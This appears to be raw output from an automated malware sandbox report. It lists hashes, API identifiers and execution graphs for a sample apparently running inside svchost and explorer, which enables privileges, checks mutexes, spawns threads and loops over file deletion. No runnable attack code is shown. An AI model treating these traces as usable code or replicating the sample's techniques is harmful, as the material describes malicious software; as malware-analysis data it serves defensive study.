                                                      • Instruction ID: 0cde9e117e64651ca938c4831223f337f99cb4b1f0d67765dd37bdadba7f4786
                                                      • Opcode Fuzzy Hash: b06f836396c8decc4b724427a3c82975a05fcb9bcb80fa40c0f4ad766a3eab19
                                                      • Instruction Fuzzy Hash: D5815D70A18E5C8FEB45EF68D8887DEB7E1FB59301F504519E48BC31A2DB348944CB86
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$_errno_invalid_parameter_noinfo
                                                      • String ID: 2#b.$83%1$dg79
                                                      • API String ID: 497604498-219530087
                                                      • Opcode ID: faaa8807c14b811c25bf28320fbba4350420f1ba0c4674bab9fffd79990433f1
                                                      • Instruction ID: da0e14c0490822ea088092ed6fcf34d4d544af534e35400ad6dbf62e4be5601c
                                                      • Opcode Fuzzy Hash: faaa8807c14b811c25bf28320fbba4350420f1ba0c4674bab9fffd79990433f1
                                                      • Instruction Fuzzy Hash: AF814B70618A9C8FEB45EF68D8887DDB7F1FB5A301F50451AE08BD31A2DB748944CB86
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$_errno_invalid_parameter_noinfo
                                                      • String ID: 13a.$83y.$dh74
                                                      • API String ID: 497604498-3522534043
                                                      • Opcode ID: 5aba02238f6d805f1ce277d98eda66def5532b63aa6b0690fc91dce229074048
                                                      • Instruction ID: 38f0e9bbefa63ccdd8a9413268364dedc5adc2d29bec7fad42f4bd3d9d7804b7
                                                      • Opcode Fuzzy Hash: 5aba02238f6d805f1ce277d98eda66def5532b63aa6b0690fc91dce229074048
                                                      • Instruction Fuzzy Hash: 46615D70618E488FFB56EF68D49879DB7F1FB99300F500529E48BD32A2DB788544CB86
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                      • String ID:
                                                      • API String ID: 1991439119-0
                                                      • Opcode ID: 52fa54e973aeb2b19a49adb6474171634653c8fc01917d0a0f6d6f57603e69a4
                                                      • Instruction ID: 46c9b861451510dfa351461a488e0356708a83157c0d8491a19c6d21caabf34e
                                                      • Opcode Fuzzy Hash: 52fa54e973aeb2b19a49adb6474171634653c8fc01917d0a0f6d6f57603e69a4
                                                      • Instruction Fuzzy Hash: D411607131AE088AF756EB28FC857E672A0E796741F44452AD443C38E1EE3C898887C6
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strstr
                                                      • String ID: Internet Explorer$Microsoft
                                                      • API String ID: 1392478783-2337349988
                                                      • Opcode ID: 0c25899f695bc5a9acd01b9e17ef5bb873a41d5fd89ef3d92cb2c7e8141f0d52
                                                      • Instruction ID: 7d8fdefae3fca78c7f01050cbf46e58ac24d422d8f8d4d2aba90c1e54b84fd3d
                                                      • Opcode Fuzzy Hash: 0c25899f695bc5a9acd01b9e17ef5bb873a41d5fd89ef3d92cb2c7e8141f0d52
                                                      • Instruction Fuzzy Hash: 8521B332215A8881FB92DB19E49039A7761F39D3E4F505321F6ED425EADF2DC68CCB00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Packaged__crt
                                                      • String ID:
                                                      • API String ID: 2805518503-3916222277
                                                      • Opcode ID: 70db6fc94174a6892a7a36fea4187ff861a667536073b8b7d02556fb5a49896d
                                                      • Instruction ID: 1fcfe0bf7a114e5c555e7b5dcd95cc7a935aab386f8908e637e0488cc28da68b
                                                      • Opcode Fuzzy Hash: 70db6fc94174a6892a7a36fea4187ff861a667536073b8b7d02556fb5a49896d
                                                      • Instruction Fuzzy Hash: AD314F7061CB488FDB64EF1CE4857AAB7E0FB99711F14065EE489C3292EB74D900CB86

                                                      Execution Graph

                                                      Execution Coverage:11.6%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:4
                                                      Total number of Limit Nodes:1
                                                      execution_graph 41 1220488 42 1220491 41->42 43 12204b1 SleepEx DeleteFileW 42->43 43->43 44 12204c1 43->44

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_01220488 1 Function_01220218 2 Function_0122033F

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 1220488-12204ac 3 12204b1-12204bf SleepEx DeleteFileW 0->3 3->3 4 12204c1-12204cd 3->4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.3293824549.0000000001220000.00000020.00000001.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_1220000_explorer.jbxd
                                                      Similarity
                                                      • API ID: DeleteFileSleep
                                                      • String ID:
                                                      • API String ID: 3161721237-0
                                                      • Opcode ID: 8087837dc196c9fd9eb6c0fc42b97edb870f0ea81229feead1af620e7ad2ccc8
                                                      • Instruction ID: e7e2e69932fd1ffb8e4346831cff6fcb66baafc2290cbd77b7ca6dc6004717cc
                                                      • Opcode Fuzzy Hash: 8087837dc196c9fd9eb6c0fc42b97edb870f0ea81229feead1af620e7ad2ccc8
                                                      • Instruction Fuzzy Hash: CBE06D2170CB1D4F9759AB6CBC9523C37D2C7D8231B00063BD249C22A6DD2585528285

                                                      Execution Graph

                                                      Execution Coverage:9.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:4.3%
                                                      Total number of Nodes:1916
                                                      Total number of Limit Nodes:27
                                                      execution_graph 30271 10036725 30272 10036733 30271->30272 30273 1003672e 30271->30273 30277 10036748 30272->30277 30289 100454c3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 30273->30289 30276 10036741 30279 10036754 _doexit 30277->30279 30278 100367a2 30281 100367ff _doexit 30278->30281 30338 1001a9a0 30278->30338 30279->30278 30279->30281 30290 100365b3 30279->30290 30281->30276 30283 100367ba 30284 1001a9a0 ___DllMainCRTStartup 570 API calls 30283->30284 30288 100367dc 30283->30288 30286 100367d2 30284->30286 30285 100365b3 __CRT_INIT@12 131 API calls 30285->30281 30287 100365b3 __CRT_INIT@12 131 API calls 30286->30287 30287->30288 30288->30281 30288->30285 30289->30272 30291 100365bf _doexit 30290->30291 30292 10036641 30291->30292 30293 100365c7 30291->30293 30295 10036645 30292->30295 30296 100366aa 30292->30296 30388 1003f54c GetProcessHeap 30293->30388 30300 10036666 30295->30300 30331 100365d0 _doexit __CRT_INIT@12 30295->30331 30479 1003c89b 68 API calls _doexit 30295->30479 30298 100366af 30296->30298 30299 1003670d 30296->30299 30297 100365cc 30297->30331 30389 10041828 30297->30389 30484 1003937d 30298->30484 30299->30331 30501 100416b8 77 API calls 2 library calls 30299->30501 30480 1003c76f 71 API calls _free 30300->30480 30305 100366ba 30305->30331 30487 10039211 30305->30487 30308 1003666b 30310 1003667c __CRT_INIT@12 30308->30310 30481 10043f01 69 API calls _free 30308->30481 30483 10036695 TlsFree __mtterm 30310->30483 30314 10036677 30482 1004189e TlsFree __mtterm 30314->30482 30320 100366e3 30322 10036701 30320->30322 30323 100366e9 30320->30323 30495 10033984 30322->30495 30494 10041775 68 API calls 4 library calls 30323->30494 30327 100366f1 GetCurrentThreadId 30327->30331 30331->30278 30339 1001aba8 30338->30339 30340 1001a9cb 30338->30340 30342 1001abae 30339->30342 30383 1001ab94 Mailbox 30339->30383 30607 1001b976 CreateFileMappingA 30340->30607 30735 10007486 30342->30735 30347 1001a9da 30616 1001c2a5 GetCurrentProcess OpenProcessToken 30347->30616 30353 1001aa02 30677 10015fd9 30353->30677 30354 1001a9e6 OutputDebugStringA CreateMutexA 30360 1001aa21 Mailbox ___DllMainCRTStartup 30354->30360 30358 1001aa78 ___DllMainCRTStartup 30634 10001d63 30358->30634 30621 10011419 30360->30621 30364 1001aab5 30365 1001aab9 numpunct 30364->30365 30366 1001aaea numpunct 30364->30366 30692 10003256 30365->30692 30664 10001f26 30366->30664 30369 1001aafc 30671 1000e4a3 30369->30671 30370 1001aad0 30703 1000da3f 30370->30703 30373 1001ab0a ___DllMainCRTStartup 30377 1001ab2b numpunct 30373->30377 30378 1001ab6e 30373->30378 30376 1001aae6 30717 100117aa 30376->30717 30382 10003256 ___DllMainCRTStartup 69 API calls 30377->30382 30380 1001ab77 CreateThread 30378->30380 30378->30383 30380->30383 31936 1001a91c 30380->31936 30384 1001ab42 30382->30384 30383->30283 30385 1000da3f ___DllMainCRTStartup 108 API calls 30384->30385 30386 1001ab49 30385->30386 30387 10002d15 ___DllMainCRTStartup 69 API calls 30386->30387 30387->30376 30388->30297 30502 1003c94f EncodePointer EncodePointer __init_pointers __initp_misc_winsig 30389->30502 30479->30300 30480->30308 30481->30314 30483->30331 30485 10039390 30484->30485 30486 10039394 TlsGetValue 30484->30486 30485->30305 30486->30305 30490 10039218 30487->30490 30489 100366cb 30489->30331 30493 1003939c TlsSetValue 30489->30493 30490->30489 30491 10039236 Sleep 30490->30491 30596 10045628 30490->30596 30492 1003924d 30491->30492 30492->30489 30492->30490 30493->30320 30494->30327 30496 100339b6 __dosmaperr 30495->30496 30497 1003398d RtlFreeHeap 30495->30497 30496->30331 30497->30496 30498 100339a2 30497->30498 30606 10037f1f 68 API calls __getptd_noexit 30498->30606 30500 100339a8 GetLastError 30500->30496 30501->30331 30597 10045633 30596->30597 30598 1004564e 30596->30598 30597->30598 30599 1004563f 30597->30599 30601 1004565e HeapAlloc 30598->30601 30602 10045644 30598->30602 30605 1003d131 DecodePointer 30598->30605 30604 10037f1f 68 API calls __getptd_noexit 30599->30604 30601->30598 30601->30602 30602->30490 30604->30602 30605->30598 30606->30500 30608 1001b9a4 MapViewOfFile 30607->30608 30609 1001b99a GetLastError 30607->30609 30610 1001a9d0 30608->30610 30611 1001b9bc CloseHandle 30608->30611 30609->30610 30612 1000c15a 30610->30612 30611->30610 30613 1000c180 __gmtime64_s 30612->30613 30748 100347dc 30613->30748 30615 1000c199 __gmtime64_s _memmove 30615->30347 30615->30615 30617 1001a9e0 30616->30617 30618 1001c2c6 LookupPrivilegeValueA 30616->30618 30617->30353 30617->30354 30619 1001c30c CloseHandle 30618->30619 30620 1001c2dc AdjustTokenPrivileges 30618->30620 30619->30617 30620->30617 30620->30619 30622 10011423 __EH_prolog numpunct 30621->30622 30623 10001f26 numpunct 69 API calls 30622->30623 30624 10011449 30623->30624 30625 10011452 numpunct 30624->30625 30626 100114b6 30624->30626 30628 10001f26 numpunct 69 API calls 30625->30628 30627 10002d15 ___DllMainCRTStartup 69 API calls 30626->30627 30633 10011485 Mailbox ___DllMainCRTStartup 30627->30633 30629 1001146a 30628->30629 30630 10015fd9 ___DllMainCRTStartup 69 API calls 30629->30630 30631 10011477 30630->30631 30632 1001bc82 ___DllMainCRTStartup 72 API calls 30631->30632 30632->30633 30633->30358 30635 10001d7f numpunct 30634->30635 30636 10001f26 numpunct 69 API calls 30635->30636 30637 10001d8b 30636->30637 30638 1001a6d8 30637->30638 30639 1001a6e2 __gmtime64_s __EH_prolog 30638->30639 30794 1001136c 30639->30794 30641 1001a711 Mailbox 30804 1001c213 30641->30804 30645 1001a746 numpunct 30646 10003256 ___DllMainCRTStartup 69 API calls 30645->30646 30647 1001a75e 30646->30647 30823 10001898 30647->30823 30649 1001a775 30650 10001d63 numpunct 69 API calls 30649->30650 30651 1001a77e 30650->30651 30827 100168f4 30651->30827 30653 1001a7a1 OpenMutexA GetLastError 30656 1001a78e 30653->30656 30657 1001a7f6 ___DllMainCRTStartup 30653->30657 30654 1001a7cd OpenMutexA GetLastError 30654->30656 30654->30657 30655 1001a833 ReleaseMutex CloseHandle 30655->30656 30656->30653 30656->30654 30656->30657 30658 1001a866 CreateMutexA CreateMutexA GetLastError 30656->30658 30659 1001a846 Sleep 30656->30659 30657->30655 30660 1001a811 ReleaseMutex CloseHandle 30657->30660 30662 1001a8a7 ReleaseMutex CloseHandle ReleaseMutex CloseHandle 30658->30662 30663 1001a8d5 Mailbox ___DllMainCRTStartup 30658->30663 30659->30653 30661 1001a861 30659->30661 30660->30659 30661->30663 30662->30663 30663->30364 30665 10001f36 ___DllMainCRTStartup 30664->30665 30666 10001f56 30665->30666 30667 10001f3a 30665->30667 30668 10001f9f ___DllMainCRTStartup 69 API calls 30666->30668 30906 10001e92 30667->30906 30670 10001f54 _memmove 30668->30670 30670->30369 30672 1000e4b0 30671->30672 30673 1000e4b5 30671->30673 30672->30373 30674 10002d15 ___DllMainCRTStartup 69 API calls 30673->30674 30675 1000e4c6 30674->30675 30931 1000dd2b 30675->30931 30678 10015ff7 char_traits 30677->30678 31244 1001658d 30678->31244 30680 10016003 30681 1001bc82 30680->30681 30682 1001bc8c __EH_prolog 30681->30682 30683 10001d63 numpunct 69 API calls 30682->30683 30684 1001bcab 30683->30684 30685 1001bd20 30684->30685 30686 1001bcd5 LocalAlloc 30684->30686 30685->30360 30686->30685 30687 1001bcee WideCharToMultiByte 30686->30687 30689 1001bd0f numpunct 30687->30689 30690 10001f26 numpunct 69 API calls 30689->30690 30691 1001bd19 LocalFree 30690->30691 30691->30685 30693 10003266 ___DllMainCRTStartup 30692->30693 30694 10003286 30693->30694 30695 1000326a 30693->30695 30696 10003296 30694->30696 30697 100032ed 30694->30697 30701 10002f31 ___DllMainCRTStartup 69 API calls 30695->30701 30699 10001f9f ___DllMainCRTStartup 69 API calls 30696->30699 30702 10003284 _memmove 30696->30702 31253 1003248d 69 API calls 2 library calls 30697->31253 30699->30702 30701->30702 30702->30370 30704 1001136c ___DllMainCRTStartup 108 API calls 30703->30704 30705 1000dab8 Mailbox ___DllMainCRTStartup 30704->30705 30706 1000dada 30705->30706 30708 100339bc _malloc 68 API calls 30705->30708 30707 1000daf4 30706->30707 30709 100339bc _malloc 68 API calls 30706->30709 30710 1000db09 30707->30710 30711 100339bc _malloc 68 API calls 30707->30711 30708->30706 30709->30707 30712 1000db22 30710->30712 30713 100339bc _malloc 68 API calls 30710->30713 30711->30710 30714 10002d15 30712->30714 30713->30712 30715 10001e92 numpunct 69 API calls 30714->30715 30716 10002d34 30715->30716 30716->30376 30718 100117b4 ___DllMainCRTStartup __EH_prolog numpunct 30717->30718 30719 10001f26 numpunct 69 API calls 30718->30719 30720 100117f8 30719->30720 30721 10001e92 numpunct 69 API calls 30720->30721 30722 10011824 30721->30722 30723 1001183b 30722->30723 30724 10001e92 numpunct 69 API calls 30722->30724 31254 10015de8 30723->31254 30724->30723 30727 10011850 31265 1001570f 30727->31265 30728 10011857 31289 100154f5 122 API calls 6 library calls 30728->31289 30731 10011855 30732 1001185c Sleep ReleaseMutex CloseHandle ReleaseMutex CloseHandle 30731->30732 31290 10011988 30732->31290 31901 1001e1a7 30735->31901 30737 1000749e 30738 100074d2 30737->30738 31916 1000bdb5 112 API calls 3 library calls 30737->31916 31917 1000e7f8 30738->31917 30741 100074f8 TerminateThread CloseHandle 30742 10007509 30741->30742 30743 10007513 TerminateThread CloseHandle 30742->30743 30744 10007524 30742->30744 30743->30744 30746 10007531 WSACleanup 30744->30746 30747 1000752e CloseHandle 30744->30747 30747->30746 30751 100347fa 30748->30751 30750 100347f5 30750->30615 30752 10034804 30751->30752 30753 10034819 30751->30753 30782 10037f1f 68 API calls __getptd_noexit 30752->30782 30756 1003482a 30753->30756 30759 1003484d 30753->30759 30755 10034809 30783 1003b745 9 API calls __gmtime64_s 30755->30783 30780 10034833 30756->30780 30792 10037f1f 68 API calls __getptd_noexit 30756->30792 30784 10037f1f 68 API calls __getptd_noexit 30759->30784 30760 10034814 30760->30750 30761 100348d5 30793 1003b745 9 API calls __gmtime64_s 30761->30793 30763 10034852 30765 1003488b 30763->30765 30766 1003485f 30763->30766 30788 10034714 99 API calls 2 library calls 30765->30788 30785 10034714 99 API calls 2 library calls 30766->30785 30769 10034870 30771 100348c4 30769->30771 30772 10034878 30769->30772 30770 1003489c 30770->30771 30774 100348ae 30770->30774 30771->30780 30791 10037f1f 68 API calls __getptd_noexit 30771->30791 30786 10037f1f 68 API calls __getptd_noexit 30772->30786 30789 10037f1f 68 API calls __getptd_noexit 30774->30789 30775 1003487d 30775->30780 30787 10037f1f 68 API calls __getptd_noexit 30775->30787 30778 100348b3 30778->30780 30790 10037f1f 68 API calls __getptd_noexit 30778->30790 30780->30750 30782->30755 30783->30760 30784->30763 30785->30769 30786->30775 30787->30780 30788->30770 30789->30778 30790->30780 30791->30761 30792->30761 30793->30780 30795 10011386 CoCreateGuid 30794->30795 30835 10039700 30794->30835 30797 100113b3 30795->30797 30798 10011397 __flswbuf 30795->30798 30838 10035212 104 API calls 3 library calls 30797->30838 30837 100354d1 106 API calls 7 library calls 30798->30837 30801 100113aa ___DllMainCRTStartup 30802 10001d63 numpunct 69 API calls 30801->30802 30803 10011412 30802->30803 30803->30641 30805 1001c21d __EH_prolog 30804->30805 30806 10001d63 numpunct 69 API calls 30805->30806 30807 1001c23c __gmtime64_s 30806->30807 30808 1001c25e GetComputerNameA 30807->30808 30809 1001c285 numpunct 30808->30809 30810 10001f26 numpunct 69 API calls 30809->30810 30811 1001a721 30810->30811 30812 10032fed 30811->30812 30813 10033009 30812->30813 30814 1003301e 30812->30814 30839 10037f1f 68 API calls __getptd_noexit 30813->30839 30814->30813 30816 10033025 30814->30816 30841 1003b8cd 104 API calls 13 library calls 30816->30841 30818 1003300e 30840 1003b745 9 API calls __gmtime64_s 30818->30840 30819 1003304b 30821 10033019 30819->30821 30842 1003b780 99 API calls 5 library calls 30819->30842 30821->30645 30825 100018ac ___DllMainCRTStartup 30823->30825 30824 10032fed _sprintf 104 API calls 30824->30825 30825->30824 30826 100018ff _memmove 30825->30826 30826->30649 30828 100168fe __EH_prolog numpunct 30827->30828 30843 10003137 30828->30843 30830 1001693d numpunct 30831 10003256 ___DllMainCRTStartup 69 API calls 30830->30831 30832 1001694d 30831->30832 30847 10002f31 30832->30847 30834 10016959 30834->30656 30836 1003970c 30835->30836 30836->30795 30837->30801 30838->30801 30839->30818 30840->30821 30841->30819 30842->30821 30844 10003148 30843->30844 30846 10003155 30843->30846 30844->30846 30857 10001f9f 30844->30857 30846->30830 30848 10002fc2 30847->30848 30849 10002f46 30847->30849 30904 100324bb 69 API calls 2 library calls 30848->30904 30850 10002fcc 30849->30850 30851 10002f5f 30849->30851 30905 1003248d 69 API calls 2 library calls 30850->30905 30854 10001f9f ___DllMainCRTStartup 69 API calls 30851->30854 30856 10002f70 _memmove 30851->30856 30854->30856 30856->30834 30858 10001ff7 30857->30858 30859 10001fab 30857->30859 30868 1003248d 69 API calls 2 library calls 30858->30868 30863 10001fb9 ___DllMainCRTStartup 30859->30863 30864 10002034 30859->30864 30863->30846 30865 1000203e __EH_prolog 30864->30865 30869 1000218b 30865->30869 30867 10002095 _memmove 30867->30863 30870 10002197 30869->30870 30871 100021ae 30869->30871 30873 100021a2 std::exception::exception 30870->30873 30876 10033888 30870->30876 30871->30867 30873->30871 30884 100374ab RaiseException 30873->30884 30875 1003248c 30880 10033890 30876->30880 30878 100338aa 30878->30873 30880->30878 30881 100338ac std::exception::exception 30880->30881 30885 100339bc 30880->30885 30902 1003d131 DecodePointer 30880->30902 30903 100374ab RaiseException 30881->30903 30883 100338d6 30884->30875 30886 10033a37 30885->30886 30893 100339c8 30885->30893 30887 1003d131 _malloc DecodePointer 30886->30887 30888 10033a3d 30887->30888 30890 10037f1f __gmtime64_s 67 API calls 30888->30890 30889 1003cd35 __FF_MSGBANNER 67 API calls 30899 100339d3 30889->30899 30901 10033a2f 30890->30901 30891 100339fb RtlAllocateHeap 30891->30893 30891->30901 30892 1003cd92 __NMSG_WRITE 67 API calls 30892->30899 30893->30891 30894 10033a23 30893->30894 30897 1003d131 _malloc DecodePointer 30893->30897 30898 10033a21 30893->30898 30893->30899 30895 10037f1f __gmtime64_s 67 API calls 30894->30895 30895->30898 30896 1003c759 _doexit GetModuleHandleExW GetProcAddress ExitProcess 30896->30899 30897->30893 30900 10037f1f __gmtime64_s 67 API calls 30898->30900 30899->30889 30899->30892 30899->30893 30899->30896 30900->30901 30901->30880 30902->30880 30903->30883 30907 10001ea7 30906->30907 30908 10001f1b 30906->30908 30909 10001eb4 30907->30909 30910 10001ecb 30907->30910 30929 100324bb 69 API calls 2 library calls 30908->30929 30923 10002005 69 API calls numpunct 30909->30923 30913 10001f9f ___DllMainCRTStartup 69 API calls 30910->30913 30920 10001ec9 _memmove 30913->30920 30914 10001ebc 30924 10001db3 30914->30924 30920->30670 30923->30914 30925 10001e2a 30924->30925 30928 10001dc4 _memmove 30924->30928 30930 100324bb 69 API calls 2 library calls 30925->30930 30928->30920 30932 1000dd35 __gmtime64_s __EH_prolog 30931->30932 30991 10033c98 30932->30991 30935 1000e029 GetLastError 30994 1000c213 30935->30994 30936 1000dd9c 31046 10033eba 85 API calls __fread_nolock 30936->31046 30940 1000ddb0 30943 1000e005 numpunct 30940->30943 30944 1000ddce _memmove 30940->30944 30946 10001f26 numpunct 69 API calls 30943->30946 30948 10001f26 numpunct 69 API calls 30944->30948 30957 1000de97 Mailbox 30944->30957 30949 1000e01b 30946->30949 30953 1000de7a 30948->30953 31056 10033fd2 104 API calls 5 library calls 30949->31056 30953->30957 30961 10001e92 numpunct 69 API calls 30953->30961 31047 10033afd 30957->31047 30958 1000e023 Mailbox 30965 10033c98 ___DllMainCRTStartup 148 API calls 30958->30965 30969 1000dfff Mailbox 30958->30969 30961->30957 30962 1000dec3 31052 10034410 GetSystemTimeAsFileTime 30962->31052 30967 1000e0cc 30965->30967 30966 1000deec 31054 100344ab 68 API calls 2 library calls 30966->31054 30970 1000e153 numpunct 30967->30970 30971 1000e0d4 30967->30971 30969->30672 30977 10001f26 numpunct 69 API calls 30970->30977 30974 10034410 __time64 GetSystemTimeAsFileTime 30971->30974 30972 1000df04 30973 10032fed _sprintf 104 API calls 30972->30973 30975 1000df55 numpunct 30973->30975 30976 1000e0da 30974->30976 30980 10001f26 numpunct 69 API calls 30975->30980 30978 10011419 ___DllMainCRTStartup 72 API calls 30976->30978 30977->30969 30979 1000e0ee 30978->30979 30981 10032fed _sprintf 104 API calls 30979->30981 30982 1000df75 30980->30982 30984 1000e118 Mailbox 30981->30984 30983 10011419 ___DllMainCRTStartup 72 API calls 30982->30983 30989 1000df93 Mailbox 30982->30989 30983->30989 30984->30984 31057 10034adc 101 API calls 4 library calls 30984->31057 30985 1000dff7 31055 10033fd2 104 API calls 5 library calls 30985->31055 30988 1000e148 31058 10033fd2 104 API calls 5 library calls 30988->31058 30989->30949 30989->30985 31059 10033bd4 30991->31059 30993 1000dd8f 30993->30935 30993->30936 30995 1000c21d __EH_prolog 30994->30995 31152 10009203 30995->31152 30998 1000c24d 31158 1000c390 69 API calls ___DllMainCRTStartup 30998->31158 31000 1000c240 31157 1000952e 81 API calls ___DllMainCRTStartup 31000->31157 31001 1000c24b 31003 10035368 31001->31003 31160 1003537d 31003->31160 31005 1000e051 31006 10015c63 31005->31006 31007 10015c90 ___DllMainCRTStartup 31006->31007 31008 10015c7e 31006->31008 31201 10016085 69 API calls 2 library calls 31007->31201 31009 10009643 ___DllMainCRTStartup 69 API calls 31008->31009 31010 1000e06c 31009->31010 31012 1000c266 31010->31012 31016 1000c279 _strnlen 31012->31016 31013 1000c2ec 31205 100046f1 RaiseException __CxxThrowException@8 31013->31205 31015 1000c2b5 31202 10008b77 69 API calls ___DllMainCRTStartup 31015->31202 31016->31013 31016->31015 31018 1000c2c1 31203 100342e6 68 API calls 2 library calls 31018->31203 31021 1000c2d6 31204 10009dfb RaiseException ___DllMainCRTStartup 31021->31204 31023 1000c2e5 31024 10009643 31023->31024 31025 1000964e 31024->31025 31026 10009676 31025->31026 31027 10009697 31025->31027 31030 1000965c 31025->31030 31206 100342e6 68 API calls 2 library calls 31026->31206 31207 10009d50 69 API calls 3 library calls 31027->31207 31032 1001c12c 31030->31032 31031 1000969c 31037 1001c136 __EH_prolog 31032->31037 31033 1001c1fc Mailbox 31033->30958 31038 1001c185 31037->31038 31041 1001c194 31037->31041 31211 10008b77 69 API calls ___DllMainCRTStartup 31037->31211 31212 1003657a 78 API calls 2 library calls 31037->31212 31038->31041 31213 10009dfb RaiseException ___DllMainCRTStartup 31038->31213 31040 1001c1b4 PathIsDirectoryA 31040->31041 31042 1001c1bf 31040->31042 31041->31033 31041->31040 31208 100364ca 31041->31208 31043 10015c63 ___DllMainCRTStartup 69 API calls 31042->31043 31044 1001c1cc CreateDirectoryA 31043->31044 31214 10004766 31044->31214 31046->30940 31048 10033b06 31047->31048 31224 100360ce 31048->31224 31051 100344ab 68 API calls 2 library calls 31051->30962 31053 1003443e __aulldiv 31052->31053 31053->30966 31054->30972 31055->30969 31056->30958 31057->30988 31058->30969 31062 10033be0 _doexit 31059->31062 31060 10033bf2 31109 10037f1f 68 API calls __getptd_noexit 31060->31109 31062->31060 31064 10033c1f 31062->31064 31063 10033bf7 31110 1003b745 9 API calls __gmtime64_s 31063->31110 31078 10040260 31064->31078 31067 10033c24 31068 10033c3a 31067->31068 31069 10033c2d 31067->31069 31071 10033c63 31068->31071 31072 10033c43 31068->31072 31111 10037f1f 68 API calls __getptd_noexit 31069->31111 31092 10040378 31071->31092 31112 10037f1f 68 API calls __getptd_noexit 31072->31112 31073 10033c02 _doexit @_EH4_CallFilterFunc@8 31073->30993 31079 1004026c _doexit 31078->31079 31080 10037966 __lock 68 API calls 31079->31080 31081 1004027a 31080->31081 31082 100402f1 31081->31082 31087 100379ee __mtinitlocknum 68 API calls 31081->31087 31090 100402ea 31081->31090 31117 1003517b 69 API calls __lock 31081->31117 31118 100351e5 LeaveCriticalSection LeaveCriticalSection _doexit 31081->31118 31119 1003925b 68 API calls _malloc 31082->31119 31085 100402f8 31086 10040307 InitializeCriticalSectionAndSpinCount EnterCriticalSection 31085->31086 31085->31090 31086->31090 31087->31081 31089 10040364 _doexit 31089->31067 31114 1004036f 31090->31114 31100 10040395 31092->31100 31093 100403a9 31124 10037f1f 68 API calls __getptd_noexit 31093->31124 31095 100403ae 31125 1003b745 9 API calls __gmtime64_s 31095->31125 31096 100405ac 31121 10048435 31096->31121 31099 10033c6e 31113 10033c90 LeaveCriticalSection LeaveCriticalSection __fsopen 31099->31113 31100->31093 31108 10040550 31100->31108 31126 10048453 78 API calls __mbsnbcmp_l 31100->31126 31102 10040516 31102->31093 31127 10048580 85 API calls __mbsnbicmp_l 31102->31127 31104 10040549 31104->31108 31128 10048580 85 API calls __mbsnbicmp_l 31104->31128 31106 10040568 31106->31108 31129 10048580 85 API calls __mbsnbicmp_l 31106->31129 31108->31093 31108->31096 31109->31063 31110->31073 31111->31073 31112->31073 31113->31073 31120 10037aca LeaveCriticalSection 31114->31120 31116 10040376 31116->31089 31117->31081 31118->31081 31119->31085 31120->31116 31130 10048322 31121->31130 31123 1004844e 31123->31099 31124->31095 31125->31099 31126->31102 31127->31104 31128->31106 31129->31108 31133 1004832e _doexit 31130->31133 31131 10048340 31149 10037f1f 68 API calls __getptd_noexit 31131->31149 31133->31131 31135 10048377 31133->31135 31134 10048345 31150 1003b745 9 API calls __gmtime64_s 31134->31150 31141 100483e9 31135->31141 31138 10048394 31151 100483bd LeaveCriticalSection __unlock_fhandle 31138->31151 31140 1004834f _doexit 31140->31123 31142 1003c677 ___copy_path_to_wide_string 73 API calls 31141->31142 31143 100483fd 31142->31143 31144 10048403 31143->31144 31145 1004baae __wsopen_helper 131 API calls 31143->31145 31144->31138 31146 10048423 31145->31146 31147 10033984 _free 68 API calls 31146->31147 31148 1004842d 31147->31148 31148->31138 31149->31134 31150->31140 31151->31140 31153 10009210 31152->31153 31154 10009221 31152->31154 31153->30998 31153->31000 31159 100046f1 RaiseException __CxxThrowException@8 31154->31159 31157->31001 31158->31001 31167 10034bce 31160->31167 31164 1003539e 31176 1003b745 9 API calls 